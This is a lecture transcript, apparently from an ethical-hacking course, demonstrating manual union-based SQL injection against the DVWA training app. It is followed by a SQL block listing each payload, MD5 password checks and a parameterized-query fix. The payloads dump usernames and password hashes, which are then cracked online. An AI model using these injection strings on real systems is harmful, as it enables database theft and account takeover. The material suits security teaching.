1 00:00:00,120 --> 00:00:02,010 Hello everybody and welcome back. 2 00:00:02,010 --> 00:00:09,990 And let us continue basically from here. What we want to do is, first of all, we want to find out the name 3 00:00:10,080 --> 00:00:16,770 of the database included in this server. Now, in order for us to do that, 4 00:00:16,790 --> 00:00:19,080 we use this command. 5 00:00:19,220 --> 00:00:27,620 So let us just add 2 for the user ID, an apostrophe, and then once again union select, and then what we 6 00:00:27,620 --> 00:00:33,200 want to do is basically add two functions that will give us the name of the database and the name of 7 00:00:33,200 --> 00:00:35,430 the user linked to the database. 8 00:00:36,000 --> 00:00:37,290 So database, 9 00:00:37,550 --> 00:00:44,880 and then two parentheses, which is the syntax for the functions in the code, then comma, users, 10 00:00:44,960 --> 00:00:53,480 and then again two parentheses, and at the end we add a hashtag and then add the apostrophe. 11 00:00:53,540 --> 00:00:55,370 So let us just run this. 12 00:00:58,310 --> 00:01:02,360 Oops: "FUNCTION dvwa.users does not exist". 13 00:01:02,820 --> 00:01:05,550 So let's see what's up with that. 14 00:01:05,820 --> 00:01:12,610 Let me just say it like this: function dvwa.users doesn't exist. 15 00:01:12,610 --> 00:01:18,700 So let me just check whether it says that it should exist. 16 00:01:19,390 --> 00:01:21,370 Or maybe it is user. 17 00:01:24,910 --> 00:01:25,190 Yeah. 18 00:01:25,190 --> 00:01:33,130 It was user, so it's not users() with the parentheses, it is user() with the parentheses. 19 00:01:33,170 --> 00:01:40,730 So as we can see, we got the name of the database with this function, and the name of the database is dvwa, 20 00:01:40,760 --> 00:01:51,190 and the name of the user that is corresponding to the database is dvwa@localhost. Now that we 21 00:01:51,190 --> 00:01:51,900 got the name,
22 00:01:51,970 --> 00:01:57,400 we want to go further on, and let us run our next command, which we will type right here. 23 00:01:57,400 --> 00:02:01,150 So 2 as an ID, and then we type here again 24 00:02:01,210 --> 00:02:06,310 union select, then follow along with me right here. 25 00:02:06,310 --> 00:02:23,500 So S C H E M A underscore name, and then comma 2 from information underscore schema dot schemata, I believe 26 00:02:23,500 --> 00:02:29,410 that is how it is pronounced, and then at the end we specify the comment once again. 27 00:02:29,500 --> 00:02:33,820 Now let me just run this and then I will explain what I ran. 28 00:02:34,030 --> 00:02:43,230 As we can see right here, the information underscore schema has basically all configuration and information 29 00:02:43,260 --> 00:02:45,570 for the MySQL database. 30 00:02:45,720 --> 00:02:52,380 So dvwa should be the database for this application. 31 00:02:52,380 --> 00:02:57,950 Now this might be a little bit hard for you at the moment, especially if you do not have any previous 32 00:02:57,950 --> 00:03:00,820 SQL knowledge or knowledge about SQL injection. 33 00:03:00,870 --> 00:03:03,540 This is basically some of the advanced part of this. 34 00:03:03,570 --> 00:03:10,800 So it might take a few times for you to rewatch this and search on the Internet for a few things 35 00:03:10,800 --> 00:03:14,990 in order to understand this fully, but that's OK. 36 00:03:15,500 --> 00:03:16,650 We'll continue right here. 37 00:03:16,650 --> 00:03:22,290 So you will have the material to practice once you learn all of this. 38 00:03:23,130 --> 00:03:26,270 Now let's just continue. 39 00:03:26,270 --> 00:03:35,420 So we ran this command right here, and we can see that dvwa is the database for this server, for 40 00:03:35,420 --> 00:03:37,510 this application. 41 00:03:37,600 --> 00:03:39,830 Now the information the... 42 00:03:39,880 --> 00:03:40,410 Pardon me.
43 00:03:40,420 --> 00:03:48,370 Now we should send the query for tables in order to find out what tables there are in the dvwa database, 44 00:03:49,540 --> 00:03:51,820 and we can do that with this command. 45 00:03:51,850 --> 00:04:00,910 So we start off with the ID once again and then union select, then we want to select table 46 00:04:01,000 --> 00:04:04,210 underscore name comma 47 00:04:04,560 --> 00:04:20,440 2 from information underscore schema dot tables where table underscore schema equals apostrophe 48 00:04:20,470 --> 00:04:27,030 dvwa, which is our database, and then we specify the hashtag for the comment. 49 00:04:27,060 --> 00:04:29,320 And we end it with the apostrophe. 50 00:04:29,320 --> 00:04:36,950 We use the hashtag as a comment, so it should ignore the rest of the code that comes after the hashtag. 51 00:04:37,000 --> 00:04:47,360 So as we can see right here, we got two tables: one of them is guestbook and the other one is users. 52 00:04:47,400 --> 00:04:55,670 Now you as an attacker will most likely be interested in this table called users, as it possibly 53 00:04:55,670 --> 00:05:00,860 could have some passwords and usernames or any other valuable information in it. 54 00:05:03,370 --> 00:05:10,090 So after we discovered the tables, we want to basically discover the columns in those tables, and we will 55 00:05:10,090 --> 00:05:14,420 target this table right here, which is the users table. 56 00:05:14,440 --> 00:05:17,260 Now we want to find out what columns there are in the table. 57 00:05:17,260 --> 00:05:25,840 So we type here 2, apostrophe, union select, and also, by the way, this union select 58 00:05:25,840 --> 00:05:28,180 you can also type in small letters. 59 00:05:28,180 --> 00:05:31,690 It doesn't have to be capital, so it doesn't. 60 00:05:31,720 --> 00:05:33,910 You can type everything in small letters.
61 00:05:33,940 --> 00:05:41,590 I just type it in capitals in order to differentiate the SQL commands from the tables and columns 62 00:05:41,590 --> 00:05:42,370 and all of that. 63 00:05:42,370 --> 00:05:44,800 So I will continue with the capital letters. 64 00:05:45,700 --> 00:05:58,960 So union select. Now what we want is to select column underscore name, and we also want to select the column underscore type from 65 00:05:59,620 --> 00:06:03,930 information underscore schema dot columns. 66 00:06:03,940 --> 00:06:09,370 Now in the previous one we selected from the information underscore schema dot tables, and now we 67 00:06:09,370 --> 00:06:19,570 want to select from information underscore schema dot columns where table underscore schema, let me see, oh, 68 00:06:19,640 --> 00:06:20,950 I didn't type it well. 69 00:06:21,020 --> 00:06:25,520 So schema equals apostrophe 70 00:06:25,580 --> 00:06:37,070 dvwa and table underscore name equals users. 71 00:06:37,070 --> 00:06:45,130 And of course we end with our hashtag and then apostrophe. Now, what we specified in this command: we 72 00:06:45,130 --> 00:06:52,690 basically said, well, table schema equals apostrophe dvwa, that's us selecting the database, 73 00:06:52,750 --> 00:06:59,070 and table name equals users, that is selecting the table that we want to get the columns from. 74 00:06:59,200 --> 00:07:05,840 So if we run this right here, you will see we get a bunch of these columns in the table users. 75 00:07:05,950 --> 00:07:15,710 So this is our command right here, and we can see we selected the database dvwa, table name users, and 76 00:07:15,710 --> 00:07:21,710 we were looking for the column name and column type. The column name will be this thing. 77 00:07:21,710 --> 00:07:30,830 So user_id, first_name, last_name, user, password, avatar, and column type would be the varchar and then the 78 00:07:30,830 --> 00:07:33,550 number in the parentheses.
79 00:07:33,560 --> 00:07:40,070 Now, out of all of this we are most likely going to be interested in the password one. As we can see, for 80 00:07:40,070 --> 00:07:51,320 the password there are 32 characters specified as a max for that particular input, and now that we 81 00:07:51,320 --> 00:07:58,910 got that, we basically want to gather all of this information and print it out on the screen. You 82 00:07:58,910 --> 00:08:03,890 do not want to print out just the password, since you won't know whom that password belongs to. What 83 00:08:03,890 --> 00:08:11,210 we want to do is basically print out the first name, last name, and then the user and password 84 00:08:11,210 --> 00:08:18,680 for that first name and last name, so we know who that username and that password belong to, and for 85 00:08:18,680 --> 00:08:25,550 that we will use a special command called concat, which will basically, as it says, concat things 86 00:08:25,550 --> 00:08:31,910 for us, since we can only output two things with this application, which are the first name and the surname. 87 00:08:31,910 --> 00:08:37,780 So we want to be able to print all of the information in these two outputs. 88 00:08:37,880 --> 00:08:46,230 So what we will do is we will print the user ID, first name and last name in the first name input, 89 00:08:46,340 --> 00:08:51,410 well, I mean in the first name output, and we will print out the username and password under the surname 90 00:08:51,440 --> 00:08:53,700 output now. 91 00:08:53,760 --> 00:08:55,470 Let me show you what I mean by that. 92 00:08:55,470 --> 00:08:57,960 So we'll type our last command like this. 93 00:08:58,110 --> 00:09:07,880 So 2 for the ID, then the apostrophe, and then what we want to do is union select, and now we want 94 00:09:07,880 --> 00:09:17,590 to concat. The first thing we want to concat would be the user ID. So user_id, as we see it right 95 00:09:17,590 --> 00:09:20,710 here, is a column in the users table.
96 00:09:20,710 --> 00:09:26,130 So we want to split it with a dash, 97 00:09:26,620 --> 00:09:29,070 so we know where it ends. 98 00:09:29,110 --> 00:09:35,860 So we split it with a dash, and we add first name to it, which is the second column in the users table. 99 00:09:35,870 --> 00:09:41,020 We can see it right here, and then we split that by the empty space. 100 00:09:41,020 --> 00:09:46,780 So just type it, and just open up an apostrophe, and then an empty space, and then another apostrophe, 101 00:09:50,130 --> 00:09:51,020 and then comma. 102 00:09:51,030 --> 00:09:57,670 And the last thing we want to print under the first output is the last name. 103 00:09:57,930 --> 00:10:05,350 So this is our first one. Let me just, maybe it's easier for you, 104 00:10:05,350 --> 00:10:11,950 you can't really see the command right here, so let me just type it in Leafpad and then I will copy 105 00:10:11,950 --> 00:10:17,640 it to the website. 106 00:10:17,650 --> 00:10:22,930 So let's just open Leafpad once again so you can see the whole command, since this command could 107 00:10:22,930 --> 00:10:27,350 possibly be a little bit hard to understand. 108 00:10:27,430 --> 00:10:34,510 We just lower this so I can also open Firefox. 109 00:10:34,510 --> 00:10:35,950 I do not need this. 110 00:10:36,070 --> 00:10:36,670 I need this. 111 00:10:36,700 --> 00:10:39,940 So let's start off with the command once again. 112 00:10:40,300 --> 00:10:49,410 So we start off, as with every command, with 2 as a user ID and an apostrophe, and then union select. 113 00:10:49,630 --> 00:10:56,150 And as I said, we want to concat a few pieces of information so that we can output all of them. 114 00:10:56,290 --> 00:10:58,660 We open parentheses, user_id. 115 00:10:58,840 --> 00:11:03,690 I believe that is the first column, as we can see right here. 116 00:11:03,700 --> 00:11:14,260 user_id,
then we want to type comma, and then open apostrophe, and then dash, close apostrophe, and then 117 00:11:14,290 --> 00:11:20,280 another comma, and then first name, which is the second column, I believe. 118 00:11:20,290 --> 00:11:21,250 Let us check. 119 00:11:21,250 --> 00:11:23,550 Yes, it is first underscore name. 120 00:11:25,060 --> 00:11:33,720 Then we want to, basically what we want to do is add a space at the end so that we can also type the last name 121 00:11:33,720 --> 00:11:34,840 after it. 122 00:11:34,920 --> 00:11:40,230 And then last name, last underscore name, and close parentheses. 123 00:11:40,350 --> 00:11:43,120 So let's see if it is really last name. 124 00:11:43,120 --> 00:11:44,460 Here it is, last name. 125 00:11:45,780 --> 00:11:50,520 So after that we want to concat the username and password as well. 126 00:11:50,520 --> 00:11:56,280 So we type here comma, and then concat, and we want to concat in the second output the user. 127 00:11:56,280 --> 00:11:57,150 So let me see. 128 00:11:57,150 --> 00:11:58,310 It is called user. 129 00:11:58,500 --> 00:11:59,850 It is right here. 130 00:11:59,970 --> 00:12:01,320 And the password. 131 00:12:01,320 --> 00:12:04,840 Now we will split these two with two dots. 132 00:12:04,990 --> 00:12:12,690 So apostrophe, two dots, and an apostrophe, and then comma, password. 133 00:12:12,690 --> 00:12:15,240 Let me see if it is password. It should be. 134 00:12:15,580 --> 00:12:16,830 Yes, it is. 135 00:12:17,030 --> 00:12:24,150 So we will print out the password, and we want to select from... where are we selecting all this information from? 136 00:12:24,150 --> 00:12:31,780 So from dvwa dot user, I believe that's how it is called. 137 00:12:31,780 --> 00:12:36,190 So I will just type that right here, or maybe it is users. 138 00:12:36,190 --> 00:12:39,210 Let me just check if it says anything 139 00:12:39,210 --> 00:12:40,020 right here. 140 00:12:41,020 --> 00:12:41,290 Yes.
141 00:12:41,290 --> 00:12:43,570 The table is called users. 142 00:12:45,520 --> 00:12:47,250 And then we add the hashtag. 143 00:12:47,260 --> 00:12:52,880 So it should ignore everything else from this command, from the rest of the code. 144 00:12:52,930 --> 00:12:58,090 So now that we selected all of this, let us try out this command. 145 00:12:58,100 --> 00:13:01,000 It shouldn't give us any error unless I mistyped something. 146 00:13:01,000 --> 00:13:06,410 So we copy this, we paste it right here, and then we submit. 147 00:13:06,700 --> 00:13:14,680 And as you can see, our output gave us all of the users: their username, their passwords, their first name, 148 00:13:14,680 --> 00:13:22,540 their last name, and the user ID. As we can see, in the first output, which is the first name, we got the 149 00:13:22,540 --> 00:13:26,950 user ID, which... we concatenated these three things. 150 00:13:27,460 --> 00:13:30,680 Maybe this is a bad example, let's go to Gordon. 151 00:13:30,700 --> 00:13:34,620 So the user ID for Gordon is 2, then we added the dash, 152 00:13:34,720 --> 00:13:37,460 then we added the first name, then an empty space, 153 00:13:37,480 --> 00:13:45,040 then the last name for the first output, which is under the first name. As we can see, this right here corresponds 154 00:13:45,160 --> 00:13:45,730 to this, 155 00:13:50,600 --> 00:13:57,500 and in the surname section we added the username and password, which for Gordon Brown the username 156 00:13:57,890 --> 00:14:00,220 would be gordonb, 157 00:14:00,260 --> 00:14:01,430 and then, separated, 158 00:14:01,430 --> 00:14:04,310 we have the password right here. 159 00:14:04,310 --> 00:14:10,700 Now you might be asking, these passwords look a little bit weird. That is because these are not really 160 00:14:10,700 --> 00:14:11,460 passwords. 161 00:14:11,480 --> 00:14:14,860 These are the hashed versions of the passwords. 162 00:14:14,930 --> 00:14:18,770 So if you tried to log in with this password, it won't work.
163 00:14:18,770 --> 00:14:26,190 This is the password that is encrypted with some algorithm. I will show you how to decrypt it in a few 164 00:14:26,190 --> 00:14:27,080 seconds. 165 00:14:27,120 --> 00:14:30,010 So let's just check out some of the other users first. 166 00:14:30,060 --> 00:14:37,010 So we have another user under the ID 3, which is called Hack, and last name Me. 167 00:14:37,380 --> 00:14:46,350 Once again, this right here corresponds to this right here, and the user for that account, the username 168 00:14:46,350 --> 00:14:53,580 for that account, is Pablo, and the hashed version of his password is this. We can see that in total we 169 00:14:53,580 --> 00:14:58,060 have six users right here and we got all of their passwords. 170 00:14:58,230 --> 00:15:05,690 Now we got to the end of the columns. We got all of their usernames, we got all of the passwords, all of the 171 00:15:05,690 --> 00:15:09,050 information, yet we still can't log in, since 172 00:15:09,050 --> 00:15:12,580 these are hashed versions of their passwords. 173 00:15:12,800 --> 00:15:20,540 Now the easiest way to find out with which type of encryption they are hashed is to copy 174 00:15:20,660 --> 00:15:21,740 the hash itself. 175 00:15:21,740 --> 00:15:31,810 So let us just copy the first hash. You just copy it and just paste it in Google, and if it 176 00:15:31,810 --> 00:15:35,720 is a known hash, it will print out what type of hash it is. 177 00:15:35,740 --> 00:15:45,010 Now, since I already know this is an MD5 hash, and there are a bunch of MD5 hash websites 178 00:15:45,160 --> 00:15:53,380 too that are used to decrypt the hash itself, as we can see, the hash in MD5 is admin. 179 00:15:53,650 --> 00:15:58,310 So the password for the admin account is admin, as we already know. 180 00:15:58,480 --> 00:16:02,160 But let us try to also decrypt all of these other passwords.
181 00:16:02,190 --> 00:16:08,080 So now that we know that the hash type is MD5, all of the other passwords will also be of the 182 00:16:08,080 --> 00:16:10,050 hash type MD5. 183 00:16:10,090 --> 00:16:20,110 So let us just type into Google simply MD5 decrypter, and here we can just go on to the first 184 00:16:20,260 --> 00:16:22,270 link, for example, it doesn't even matter. 185 00:16:24,990 --> 00:16:26,650 Let's see, MD5 hashes. 186 00:16:26,890 --> 00:16:28,950 So, let me just see. 187 00:16:29,050 --> 00:16:30,780 Where do we type it? 188 00:16:30,980 --> 00:16:40,460 Or let me just go to this one, free MD5 encryption... wait, I do not want to encrypt. 189 00:16:40,480 --> 00:16:48,970 I want to decrypt. MD5 encryption, we want... MD5 decryption. 190 00:16:49,010 --> 00:16:49,850 Here it is. 191 00:16:49,880 --> 00:16:51,410 But I want to go one step back. 192 00:16:51,410 --> 00:16:53,140 I believe this is the same website. 193 00:16:53,150 --> 00:16:57,560 So we go to the MD5 online, MD5 decryption. 194 00:16:57,740 --> 00:16:59,860 And here we just type here, 195 00:16:59,880 --> 00:17:06,550 you basically just paste your hashed password here and it will decrypt it if it is in the database. 196 00:17:06,650 --> 00:17:14,070 So let us go with the first one, even though we already decrypted the first one and we said it was admin. 197 00:17:14,080 --> 00:17:15,970 Let us just check that once again. 198 00:17:16,040 --> 00:17:19,490 So we copy, we paste it right here. 199 00:17:21,650 --> 00:17:25,120 So copy, paste, decrypt, 200 00:17:28,820 --> 00:17:30,590 and it gives us something. 201 00:17:30,680 --> 00:17:34,400 So let us just select all images with the cars. 202 00:17:34,460 --> 00:17:42,410 I don't know why this popped up right here, but we can verify it. 203 00:17:42,800 --> 00:17:46,340 Hopefully it doesn't go on with thousands of these screens.
204 00:17:46,370 --> 00:17:48,220 OK, I believe it is over. 205 00:17:48,530 --> 00:17:56,990 And here we can see that it found the password for this hash, which is admin. Now let us try another password 206 00:17:56,990 --> 00:18:00,530 from a different user, so let's go with Gordon's password. 207 00:18:00,560 --> 00:18:09,190 We copy Gordon's hash, the hash value of that password, and we type it right here, so paste, decrypt, 208 00:18:09,920 --> 00:18:13,220 and once again we get this confirmation. 209 00:18:13,220 --> 00:18:17,790 And I also don't know why this asks, but it doesn't really matter. 210 00:18:17,790 --> 00:18:23,180 Let's just click OK and let's see what Gordon's password is, and Gordon's password is 211 00:18:23,180 --> 00:18:24,920 abc123. 212 00:18:25,010 --> 00:18:28,250 Now you can also decrypt everyone's password right here. 213 00:18:28,250 --> 00:18:33,890 And if you're wondering how this works, you can just read it right here. It says MD5 is a 128-bit 214 00:18:33,980 --> 00:18:40,140 encryption algorithm which generates a hexadecimal hash of 32 characters regardless of the input word 215 00:18:40,160 --> 00:18:41,240 size. 216 00:18:41,240 --> 00:18:43,070 Now, how this website works: 217 00:18:43,100 --> 00:18:47,960 it basically has a huge database of hashed passwords 218 00:18:48,230 --> 00:18:56,010 and their decrypted passwords. As we can see, there are over a thousand billion passwords in this database. 219 00:18:56,330 --> 00:19:04,010 And most likely all of these hashed versions of passwords, pardon me, will be in that database, 220 00:19:04,070 --> 00:19:05,090 and you can check that. 221 00:19:05,090 --> 00:19:09,020 So let's just go on with all of these hashed versions. 222 00:19:09,020 --> 00:19:10,550 We can just type it right here.
223 00:19:10,590 --> 00:19:18,910 Paste it, decrypt it, and it will ask for storefronts, so we'll just select the storefront, and let us decrypt 224 00:19:18,970 --> 00:19:20,360 the password. 225 00:19:20,410 --> 00:19:26,280 So for the Hack Me account the password is charley. Now, 226 00:19:26,310 --> 00:19:32,560 let us not go over all of these passwords, since it always asks me either to select cars from 227 00:19:32,560 --> 00:19:34,240 the pictures or storefronts. 228 00:19:34,240 --> 00:19:38,240 It doesn't even matter, so I won't be bothering with the rest of the passwords. 229 00:19:38,350 --> 00:19:40,110 You can check them out if you want to, 230 00:19:40,240 --> 00:19:43,000 just to check what the passwords for these accounts are. 231 00:19:43,840 --> 00:19:46,510 I believe they're all in this database right here, 232 00:19:46,510 --> 00:19:50,070 since it is a huge database, and that's about it. 233 00:19:50,170 --> 00:19:58,360 So we successfully exploited the SQL injection. We manually exploited it, which is the advanced part of 234 00:19:58,360 --> 00:19:58,830 this. 235 00:19:58,840 --> 00:20:04,800 So there are a bunch of tools that automate this process, but it is good to know how this process works. 236 00:20:04,810 --> 00:20:09,910 And it is good to do it manually a few times in order for you to understand it, and then later on you 237 00:20:09,910 --> 00:20:15,510 can use other tools if you want to in order to automate this process. 238 00:20:15,560 --> 00:20:23,780 Now I'll just show you in the next video what blind SQL injection is, which is a lot harder than 239 00:20:23,780 --> 00:20:29,870 this one, since here we get the output right here, but in the blind one we will not get output, and it is most 240 00:20:29,870 --> 00:20:33,500 likely the case that you will always encounter. 241 00:20:33,590 --> 00:20:35,560 So I will show you how that works.
242 00:20:35,570 --> 00:20:40,820 We won't cover the entire blind SQL injection, since that will take a lot of time, but we will cover 243 00:20:40,880 --> 00:20:43,870 part of it. I will show you how you can start with it. 244 00:20:44,450 --> 00:20:48,780 So that was it for this lecture, and I hope I see you in the next one. 245 00:20:48,860 --> 00:20:49,160 Bye.
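The full chain the lecture types into the DVWA form, written out as the MySQL server actually receives it. This is an added example for this page, not the lecturer's own commands or DVWA's code. It assumes (an assumption, not something the lecture states) that the vulnerable page builds its query as SELECT first_name, last_name FROM users WHERE user_id = '<id>'; every injected id therefore opens with 2' and ends with # so that the page's own closing quote is commented out, and every UNION selects exactly two columns because the page only renders two fields. The two MD5 digests at the end are the well-known MD5 values of "admin" and "abc123", the two passwords recovered in the lecture.

```sql
-- Added example, not from the lecture. Assumed vulnerable query shape:
--   SELECT first_name, last_name FROM users WHERE user_id = '<id>'
-- Each statement below is that query after the attacker's id has been
-- spliced in; the text after # is what the server ignores.

-- Step 1: database name and connected account.
-- Input: 2' UNION SELECT database(), user() #
SELECT first_name, last_name FROM users WHERE user_id = '2'
UNION SELECT database(), user() #';
-- users() with an s is not a MySQL function; the server answers
-- "FUNCTION dvwa.users does not exist", exactly as seen in the lecture.

-- Step 2: every schema on the server (the literal 2 pads the second column).
-- Input: 2' UNION SELECT schema_name, 2 FROM information_schema.schemata #
SELECT first_name, last_name FROM users WHERE user_id = '2'
UNION SELECT schema_name, 2 FROM information_schema.schemata #';

-- Step 3: tables inside the application's schema.
-- Input: 2' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema = 'dvwa' #
SELECT first_name, last_name FROM users WHERE user_id = '2'
UNION SELECT table_name, 2 FROM information_schema.tables
  WHERE table_schema = 'dvwa' #';

-- Step 4: columns and their types for the table worth dumping.
-- Input: 2' UNION SELECT column_name, column_type FROM information_schema.columns
--          WHERE table_schema = 'dvwa' AND table_name = 'users' #
SELECT first_name, last_name FROM users WHERE user_id = '2'
UNION SELECT column_name, column_type FROM information_schema.columns
  WHERE table_schema = 'dvwa' AND table_name = 'users' #';

-- Step 5: squeeze five columns through the two visible fields with CONCAT.
-- Input: 2' UNION SELECT CONCAT(user_id, '-', first_name, ' ', last_name),
--          CONCAT(user, ':', password) FROM dvwa.users #
SELECT first_name, last_name FROM users WHERE user_id = '2'
UNION SELECT CONCAT(user_id, '-', first_name, ' ', last_name),
             CONCAT(user, ':', password)
  FROM dvwa.users #';

-- Checking a candidate password against a recovered 32-hex-character hash
-- without any lookup website: the column holds an unsalted MD5, so MD5()
-- of the guess must equal the stored value. These are the MD5 digests of
-- "admin" and "abc123", the two passwords recovered in the lecture.
SELECT MD5('admin')  = '21232f297a57a5a743894a0e4a801fc3' AS admin_is_admin,
       MD5('abc123') = 'e99a18c428cb38d5f260853678922e03' AS gordonb_is_abc123;

-- The fix on the application side: bind the id as a parameter instead of
-- splicing it into the SQL text. The same payload now arrives as one
-- opaque value to compare against user_id; no UNION is ever parsed.
PREPARE by_id FROM 'SELECT first_name, last_name FROM users WHERE user_id = ?';
SET @id = '2'' UNION SELECT database(), user() #';
EXECUTE by_id USING @id;
DEALLOCATE PREPARE by_id;
```

Two practical notes on running this against DVWA itself. When the id travels in a GET query string, a bare # ends the URL in the browser (it starts the fragment), so the comment must be sent URL-encoded as %23; the lecture types it into the form field, which encodes it for you. And the order of the UNION columns matters: the page prints the first column under "First name" and the second under "Surname", which is why the lecture packs user_id, first_name and last_name into the first CONCAT and user and password into the second.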